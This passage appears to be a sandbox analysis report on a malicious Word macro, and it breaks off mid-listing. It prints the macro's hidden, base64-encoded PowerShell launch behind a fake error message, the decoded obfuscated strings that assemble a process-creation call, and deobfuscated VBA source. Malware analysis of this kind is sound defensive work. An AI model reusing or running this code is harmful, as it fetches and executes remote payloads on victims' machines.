                                        		SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOAAnACsAJwAvAEAAXQAnACkAKwAoACcAYQBuACcAKwAnAHcAJwApACsAKAAnAFsAMwA6ACcAKwAnAC8AJwApACsAJwAvAHMAJwArACcAZQAnACsAKAAnAG8AJwArACcALgB1AGQAJwApACsAKAAnAGEAaQBwACcAKwAnAHUAcgBrAGEAcgAnACsAJwB0AC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AcgB4AC0AJwArACcANQAnACsAJwA3ADAAMAAnACkAKwAnAC0ANgAnACsAKAAnAGgAbgByADcALwBTACcAKwAnAGcAbQBzACcAKwAnAC8AQAAnACkAKwAoACcAXQBhAG4AdwAnACsAJwBbADMAJwArACcAOgAvACcAKQArACcALwBwACcAKwAnAGgAdQAnACsAKAAnAG8AbgAnACsAJwBnACcAKQArACcAYQBwACcAKwAoACcAcAAnACsAJwBsAGUAJwApACsAKAAnAC4AYwAnACsAJwBvAG0ALwAnACsAJwBtAGUAcwBzACcAKQArACcAZQAnACsAJwBuAGcAJwArACgAJwBlACcAKwAnAHIALQAnACkAKwAnAHMAbwAnACsAKAAnAHUAbgAnACsAJwBkACcAKQArACcALQA4ACcAKwAnAGsAdwAnACsAJwBrAHEAJwArACcALwBZACcAKwAoACcARgByADcALwBAACcAKwAnAF0AYQBuAHcAJwArACcAWwAnACkAKwAoACcAMwBzADoALwAvACcAKwAnAGIAJwApACsAKAAnAHIAJwArACcAZQB0ACcAKQArACcAdABzACcAKwAnAGgAYQAnACsAKAAnAHcAbQBhAGcAaQBjACcAKwAnAC4AYwBvAG0AJwArACcALwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AdAAnACkAKwAoACcALwBZAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwAnACsAJwBbADMAcwA6AC8ALwBjACcAKwAnAGEAJwArACcAZgBlAGMAZQBuACcAKwAnAHQAcgB,,) -> 0

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        L_4bpvggv2vokj75

                                        Nakuayuxnnrg5

                                        IYlnG

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        nEFlbEa

                                        Close

                                        ClgfEDCg

                                        UcUhFvH

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        ncXeGEGfF

                                        Close

                                        kIALACE

                                        StringsDecrypted Strings
                                        "Uvktlkqthymnm68w""Ti33bl29fw_53yu"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "MqoMRwwIg:\gqqsLDE\cFTTPq.jfZyU"
                                        "HNkPCvHSVKIC"
                                        "CColSRKUqE"
                                        "txLTFDcUtlBJi"
                                        "]anw[3""p]anw[3"
                                        "]an""w[3ro]anw[3]a""nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "tNUBI:\bUxfKyODA\ZyrvC.WCgQpU"
                                        "TzymSNqRGdH"
                                        "NkEpBgFHAsWaxHT"
                                        "FCWeAwOsytUsCF"
                                        "]anw[3:w]anw[3]anw[3i""n]anw[33]anw[32]anw[3_]anw[3"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "VdGtFIE:\SzlumIC\CndNBJiEG.WAxLRDDC"
                                        "LhUxJGiLUCZp"
                                        "QkKSDHgSXaAA"
                                        "RmlAGEzIZqLPNdIDj"
                                        "w]anw[3in]anw[3m]an""w[3gm]anw[3t]anw[3]anw[3"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "JhEjHJH:\heHcF\xIjwBCI.IWEODGR"
                                        "QCgbCFzJiDJUEIHES"
                                        "AfSXEBzJIIxvQmJC"
                                        "zDOlFEIFBVWkPbIC"
                                        "]anw[3""]anw[3"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "HrrfJtDR:\BPgVNA\eowWDqCnB.iaEjRFDB"
                                        "xfhECJccxFyA"
                                        "AdLOPbWTXOCCRm"
                                        "cWptEtSbgvWCAD"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "ayAqsH:\opXXFq\UykoCNloH.lEEiEJlG"
                                        "wOTiEDqNZtWN"
                                        "xaOQJbzFVCXtJADD"
                                        "ufltvttBnHJNx"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "JYXoyLAMu:\EFBhEtGsQ\owfrHBHf.anGOrJLhY"
                                        "GqSFCtOyDYdfx"
                                        "QsixYFOXyEEAmh"
                                        "QxWCtMBxGzkkBAU"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "LPJPJFI:\CTzVF\dLRZEH.maUZE"
                                        "RMNuAAEfwmHGkp"
                                        "YfIwYFFntmmdDsPv"
                                        "nbBVBbrmTJhR"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "zGzGFMUJD:\QkpIYHOrc\FwQpsJ.ddKnHUJB"
                                        "JNHUAINVrwxEKEHD"
                                        "EXrpEHndyyG"
                                        "TwoNCIGurJPYA"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "sucQc:\iYsaHyNC\NiIqHAH.mTesbI"
                                        "GApbBIepzWxnI"
                                        "lkkOeHeJHjmGONABFI"
                                        "lSOfQyhpoF"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "SQhZmTV:\ITZNAskG\hSsqo.sNJcmiGF"
                                        "ehJSnoaWvoCEfGL"
                                        "uAYnHfspvFJ"
                                        "GuEmEfvZLaJDIAX"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "DNCEiIDxC:\EYevg\MFdKF.RmyPCLa"
                                        "jyJEJqDCTEnyIA"
                                        "pIHMJANYJmFIe"
                                        "tZZjtwJRCQcVAD"
                                        LineInstructionMeta Information
                                        2

                                        Function Rvpv59xrvp7m2wb()

                                        3

                                        On Error Resume Next

                                        executed
                                        4

                                        Cju6d_0v951 = "Uvktlkqthymnm68w" + "Ti33bl29fw_53yu"

                                        5

                                        sf4 = Xj1p0_yor4q8g + Teh9tkv0p83u4g.StoryRanges.Item(2 / 2) + Gdmbhv991jtvgzq

                                        Xj1p0_yor4q8g

                                        Item

                                        Gdmbhv991jtvgzq

                                        6

                                        Goto eRxrHHEBB

                                        7

                                        Dim TptSCH as Object

                                        8

                                        Set UnVnjA = hlEyDCTAH

                                        hlEyDCTAH

                                        9

                                        Set TptSCH = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        10

                                        Dim eRxrHHEBB as Object

                                        11

                                        Set eRxrHHEBB = TptSCH.CreateTextFile("MqoMRwwIg:\gqqsLDE\cFTTPq.jfZyU")

                                        CreateTextFile

                                        12

                                        eRxrHHEBB.WriteLine "HNkPCvHSVKIC"

                                        WriteLine

                                        13

                                        eRxrHHEBB.WriteLine "CColSRKUqE"

                                        WriteLine

                                        14

                                        eRxrHHEBB.WriteLine "txLTFDcUtlBJi"

                                        WriteLine

                                        15

                                        Set VNhJZVCB = eHrGyvyM

                                        eHrGyvyM

                                        16

                                        eRxrHHEBB.Close

                                        Close

                                        17

                                        Set TptSCH = Nothing

                                        18

                                        Set IYUAEB = cVkLD

                                        cVkLD

                                        19

                                        Set eRxrHHEBB = Nothing

                                        19

                                        eRxrHHEBB:

                                        21

                                        t3s = "]anw[3" + "p]anw[3"

                                        22

                                        Eyshwbjqie_zkc = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"

                                        23

                                        Goto UaCEJEERD

                                        24

                                        Dim bwdNxC as Object

                                        25

                                        Set zubYHA = tIaWTAJA

                                        tIaWTAJA

                                        26

                                        Set bwdNxC = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        27

                                        Dim UaCEJEERD as Object

                                        28

                                        Set UaCEJEERD = bwdNxC.CreateTextFile("tNUBI:\bUxfKyODA\ZyrvC.WCgQpU")

                                        CreateTextFile

                                        29

                                        UaCEJEERD.WriteLine "TzymSNqRGdH"

                                        WriteLine

                                        30

                                        UaCEJEERD.WriteLine "NkEpBgFHAsWaxHT"

                                        WriteLine

                                        31

                                        UaCEJEERD.WriteLine "FCWeAwOsytUsCF"

                                        WriteLine

                                        32

                                        Set gnToaBcmF = PvcTcFOF

                                        PvcTcFOF

                                        33

                                        UaCEJEERD.Close

                                        Close

                                        34

                                        Set bwdNxC = Nothing

                                        35

                                        Set tNngtUo = chutdOAFs

                                        chutdOAFs

                                        36

                                        Set UaCEJEERD = Nothing

                                        36

                                        UaCEJEERD:

                                        38

                                        Pmgv9nf28vkxhyvys = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"

                                        39

                                        Goto uwCSCCEO

                                        40

                                        Dim KTDSIL as Object

                                        41

                                        Set deuxb = XhUYUbSBA

                                        XhUYUbSBA

                                        42

                                        Set KTDSIL = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        43

                                        Dim uwCSCCEO as Object

                                        44

                                        Set uwCSCCEO = KTDSIL.CreateTextFile("VdGtFIE:\SzlumIC\CndNBJiEG.WAxLRDDC")

                                        CreateTextFile

                                        45

                                        uwCSCCEO.WriteLine "LhUxJGiLUCZp"

                                        WriteLine

                                        46

                                        uwCSCCEO.WriteLine "QkKSDHgSXaAA"

                                        WriteLine

                                        47

                                        uwCSCCEO.WriteLine "RmlAGEzIZqLPNdIDj"

                                        WriteLine

                                        48

                                        Set PuAVBFFM = pzqeBGIAH

                                        pzqeBGIAH

                                        49

                                        uwCSCCEO.Close

                                        Close

                                        50

                                        Set KTDSIL = Nothing

                                        51

                                        Set pGLWAAGJ = TbHJC

                                        TbHJC

                                        52

                                        Set uwCSCCEO = Nothing

                                        52

                                        uwCSCCEO:

                                        54

                                        Agz22fuzun5rgvbir = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"

                                        55

                                        Goto NHymnJzG

                                        56

                                        Dim TiWkS as Object

                                        57

                                        Set PkQhSAw = eBvGf

                                        eBvGf

                                        58

                                        Set TiWkS = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        59

                                        Dim NHymnJzG as Object

                                        60

                                        Set NHymnJzG = TiWkS.CreateTextFile("JhEjHJH:\heHcF\xIjwBCI.IWEODGR")

                                        CreateTextFile

                                        61

                                        NHymnJzG.WriteLine "QCgbCFzJiDJUEIHES"

                                        WriteLine

                                        62

                                        NHymnJzG.WriteLine "AfSXEBzJIIxvQmJC"

                                        WriteLine

                                        63

                                        NHymnJzG.WriteLine "zDOlFEIFBVWkPbIC"

                                        WriteLine

                                        64

                                        Set ImZpAHpaF = bYwGEijH

                                        bYwGEijH

                                        65

                                        NHymnJzG.Close

                                        Close

                                        66

                                        Set TiWkS = Nothing

                                        67

                                        Set UgnVAHcRD = uvgvJGfI

                                        uvgvJGfI

                                        68

                                        Set NHymnJzG = Nothing

                                        68

                                        NHymnJzG:

                                        70

                                        C0g8w_98xxaqclw4 = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"

                                        Mid

                                        Name

                                        Application

                                        71

                                        Goto rfIxFdkBE

                                        72

                                        Dim ZZzrG as Object

                                        73

                                        Set ArkJEKEEH = rINmB

                                        rINmB

                                        74

                                        Set ZZzrG = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        75

                                        Dim rfIxFdkBE as Object

                                        76

                                        Set rfIxFdkBE = ZZzrG.CreateTextFile("HrrfJtDR:\BPgVNA\eowWDqCnB.iaEjRFDB")

                                        CreateTextFile

                                        77

                                        rfIxFdkBE.WriteLine "xfhECJccxFyA"

                                        WriteLine

                                        78

                                        rfIxFdkBE.WriteLine "AdLOPbWTXOCCRm"

                                        WriteLine

                                        79

                                        rfIxFdkBE.WriteLine "cWptEtSbgvWCAD"

                                        WriteLine

                                        80

                                        Set ZEetCEyLC = iOplaUSwB

                                        iOplaUSwB

                                        81

                                        rfIxFdkBE.Close

                                        Close

                                        82

                                        Set ZZzrG = Nothing

                                        83

                                        Set uSvkK = kUseBAG

                                        kUseBAG

                                        84

                                        Set rfIxFdkBE = Nothing

                                        84

                                        rfIxFdkBE:

                                        86

                                        M8v1nootk49plci = Agz22fuzun5rgvbir + C0g8w_98xxaqclw4 + Pmgv9nf28vkxhyvys + t3s + Eyshwbjqie_zkc

                                        87

                                        Goto bcUFD

                                        88

                                        Dim zetDIDBDI as Object

                                        89

                                        Set eTBBLHXwx = qdDeFbDk

                                        qdDeFbDk

                                        90

                                        Set zetDIDBDI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        91

                                        Dim bcUFD as Object

                                        92

                                        Set bcUFD = zetDIDBDI.CreateTextFile("ayAqsH:\opXXFq\UykoCNloH.lEEiEJlG")

                                        CreateTextFile

                                        93

                                        bcUFD.WriteLine "wOTiEDqNZtWN"

                                        WriteLine

                                        94

                                        bcUFD.WriteLine "xaOQJbzFVCXtJADD"

                                        WriteLine

                                        95

                                        bcUFD.WriteLine "ufltvttBnHJNx"

                                        WriteLine

                                        96

                                        Set vKdAbBHGq = UbNkCZ

                                        UbNkCZ

                                        97

                                        bcUFD.Close

                                        Close

                                        98

                                        Set zetDIDBDI = Nothing

                                        99

                                        Set NctjGT = fMPBmQ

                                        fMPBmQ

                                        100

                                        Set bcUFD = Nothing

                                        100

                                        bcUFD:

                                        102

                                        J_gncosnr4av4lr = Slz39ct0lz_ksnd(M8v1nootk49plci)

                                        103

                                        Goto TOXmCsgb

                                        104

                                        Dim TjDNNFkVD as Object

                                        105

